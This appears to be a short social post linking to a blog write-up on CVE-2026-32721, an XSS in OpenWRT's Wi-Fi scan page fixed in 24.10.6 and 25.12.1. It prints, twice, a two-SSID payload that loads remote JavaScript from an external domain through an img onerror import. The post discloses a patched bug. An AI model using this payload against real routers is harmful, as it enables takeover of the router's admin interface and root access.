CVE-2026-32721, XSS fixed in OpenWRT 24.10.6 / 25.12.1
tldr:
SSID 1: <a id=s href=//domain/x.js>
SSID 2: <img src=x onerror=import(s)>
https://mxsasha.eu/posts/openwrt-ssid-xss-to-root/
tldr:
SSID 1: <a id=s href=//domain/x.js>
SSID 2: <img src=x onerror=import(s)>
https://mxsasha.eu/posts/openwrt-ssid-xss-to-root/
mxsasha.eu
Root from the parking lot: OpenWRT XSS through SSID scanning (CVE-2026-32721)
Lately, I’ve been experimenting with unusual XSS vectors. XSS (cross-site scripting) allows an attacker to execute arbitrary JavaScript in another …
